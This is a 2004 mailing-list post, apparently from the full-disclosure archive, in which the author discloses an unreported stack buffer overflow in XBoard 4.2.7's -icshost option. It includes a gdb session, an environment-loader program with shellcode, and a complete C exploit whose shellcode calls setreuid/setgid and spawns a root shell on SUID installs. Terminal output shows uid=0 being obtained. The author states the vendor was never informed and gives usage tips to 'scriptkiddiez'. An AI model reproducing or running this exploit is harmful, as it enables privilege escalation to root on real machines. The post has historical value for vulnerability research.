[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <20040301231803.A067E3AA49F@ws5-8.us4.outblaze.com>
From: narkotix at linuxmail.org (narko tix)
Subject: Smashing "XBoard 4.2.7(All versions)" For Fun & Profit.*Unpublish
ed Local Stack Overflow Vulnerablity!
/**
** ! XBoard 4.2.7 UNPUBLISHED VULNERABLITY , 0hDAY !
*
* C0d3r: N4rK07IX narkotix@...uxmail.org
* Applicati0n : XBoard !stable! Game 0f Chess- For Unix systemZ <= 4.2.7 (All versions)
* Date : BUG was discovered in 29.02.2004 @ 00:15 exploited in 29.02.2004 @ 00:25
* Th3 Bug : when u w4nn4 play with other users on_line ,u must type "-ics" and "-icshost" arguments
* together(man xboard) .The BUG is in the strcpy() , which the user type the "hostname" after the -icshost
argument more than the buffer can h4ndle. Bug is discovered by me.
* Vendor : http://www.tim-mann.org/xboard.html , also the author of thiz chess g4me.
* Vendor informed? : N3v3r !
* Patch : I hope Tim will upgrade thiz game to the 4.2.8 (more practice on buffering)
* Risk : D0 n0t afraid there is n0 risk , if xboard is SUID, may some hurt.
* Tested 0n : Slackware Linux 9.0/9.1 , Mandrake Linux 9.x, Redhat 8.0, with xboard 3.6.2 and 4.2.x (all versions)
narkotix@...s:~/c-hell$ /usr/X11R6/bin/xboard -ics -icshost `perl -e 'print "A"x456'`
xboard: Could not connect to host AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA, port 5000: No such file or directory
Segmentation fault
from there on overwriting The EIP is too easy , just tried a few times..
narkotix@...s:~/c-hell$
narkotix@...s:~/c-hell$ ./xboard_env <----- putting sh3llc0de to th3 environment ... i'll give it.
narkotix@...s:~/c-hell$ gdb /usr/X11R6/bin/xboard
...
.......
(gdb) x/s
0xbffffcb6: "XBOARD=", '\220' <repeats 195 times>...
(gdb) x/s
0xbffffd7e: '\220' <repeats 200 times>... <-----------Thiz iz the address of our env w3 n33d.
(gdb) x/s
ok lets convert it to char string.. ------> \x7e\xfd\xff\bf yeah all done.
quit
narkotix@...s:~/c-hell$ /usr/X11R6/bin/xboard -ics -icshost `perl -e 'print "\x7e\xfd\xff\xbf"x166'`
sh-2.05b# id
uid=0(root) gid=100(users) groups=100(users) <-----on my box all of the programs r SUID :P just demonstrated.
sh-2.05b#
Gr33tingz: EFnet,mathmonkey,laplace_ex,blackhat community,deathmann,Islam Nation,kusev(civil engineer)
Sh0utZ: collusion,xmlguy,0xbf(fuck u bitch),and u bigmutant r u still alive ? passed your CCNP exam?
L4stW0rdZ: mathmonkey sirada bekleyen daha bir suru vuln program var, ama bir an once projeyi bitirecegimize soz veriyorum.
bu arada SunOS CD lerimi bir an once ISO larsan ben de sevinirim :P. Mucx seni seviyorum bunu Unutma...
U r as Intellig3nt as your f4th3r was :P ..love from I.T.U
**/
//Here is th3 h4x0r version of xboard_env.c Use thiz to set the env, and U do not need
//extra code for exploitation.GDB rulezz.
/****************************************CUT HERE*******************
#include <stdio.h>
#include <stdlib.h>
char shellcode[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80" // shellcode by zillion
"\xeb\x5a\x5e\x31\xc0\x88\x46\x07\x31\xc0\x31\xdb\xb0\x27\xcd"
"\x80\x85\xc0\x78\x32\x31\xc0\x31\xdb\x66\xb8\x10\x01\xcd\x80"
"\x85\xc0\x75\x0f\x31\xc0\x31\xdb\x50\x8d\x5e\x05\x53\x56\xb0"
"\x3b\x50\xcd\x80\x31\xc0\x8d\x1e\x89\x5e\x08\x89\x46\x0c\x50"
"\x8d\x4e\x08\x51\x56\xb0\x3b\x50\xcd\x80\x31\xc0\x8d\x1e\x89"
"\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
"\xcd\x80\xe8\xa1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
int main()
{
char xboard[600];
printf("XBOARD environment loader\n");
printf("=> narkotix@...uxmail.org\n");
memset(xboard,0x90,600);
memcpy(&xboard[600-strlen(shellcode)],shellcode,strlen(shellcode));
memcpy(xboard,"XBOARD=",7);
putenv(xboard);
execl("/bin/bash","bash",'\0');
return(0);
}
********************************************CUT HERE*******/
//Hey scriptkiddiez d0 U think i forget U ?. 0fcoure N0t.But before using this C0de U must set the DISPLAY,and also sysadmin
//must xhost + 'ed localhost . otherwise u will get some errorz like " Error: Can't open display: ".. njoy your life.
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#define BUFFERSIZE 448 // <----- Play with it,depending on your box. Tested on Slackware 9.0
static char hell_code[] =
//* setreuid(0,0);
"\x31\xc0" // xor %eax,%eax
"\x31\xdb" // xor %ebx,%ebx
"\x31\xc9" // xor %ecx,%ecx
"\xb0\x46" // mov $0x46,%al
"\xcd\x80" // int $0x80
/* setgid(0); */
"\x31\xdb" // xor %ebx,%ebx
"\x89\xd8" // mov %ebx,%eax
"\xb0\x2e" // mov $0x2e,%al
"\xcd\x80" // int $0x80
// execve /bin/sh
"\x31\xc0" // xor %eax,%eax
"\x50" // push %eax
"\x68\x2f\x2f\x73\x68" // push $0x68732f2f
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f
"\x89\xe3" // mov %esp,%ebx
"\x8d\x54\x24\x08" // lea 0x8(%esp,1),%edx
"\x50" // push %eax
"\x53" // push %ebx
"\x8d\x0c\x24" // lea (%esp,1),%ecx
"\xb0\x0b" // mov $0xb,%al
"\xcd\x80" // int $0x80
// exit();
"\x31\xc0" // xor %eax,%eax
"\xb0\x01" // mov $0x1,%al
"\xcd\x80"; // int $0x80
main(void)
{
printf("************************************************\n");
printf("xboard <= 4.2.7 local xploit written by N4rK07IX\n");
printf("=> narkotix@...uxmail.org\n");
char *env[2] = {hell_code,NULL};
char buffer[BUFFERSIZE];
int i;
int *adrpointer = (int *)(buffer );
int ret_addr = 0xbffffffa - strlen(hell_code) - strlen("/usr/X11R6/bin/xboard");
for (i = 0; i < BUFFERSIZE-1 ; i += 4)
*adrpointer++ = ret_addr;
execle("/usr/X11R6/bin/xboard", "xboard","-ics","-icshost",NULL,buffer,env);
if(!execle)
perror("execle()");
return(0);
}
//S3curity Is not Th3 D3f4ult
--
______________________________________________
Check out the latest SMS services @ http://www.linuxmail.org
This allows you to send and receive SMS through your mailbox.
Powered by Outblaze
-------------- next part --------------
A non-text attachment was scrubbed...
Name: xboard.c
Type: application/octet-stream
Size: 6712 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040302/3faefbba/xboard.obj
Powered by blists - more mailing lists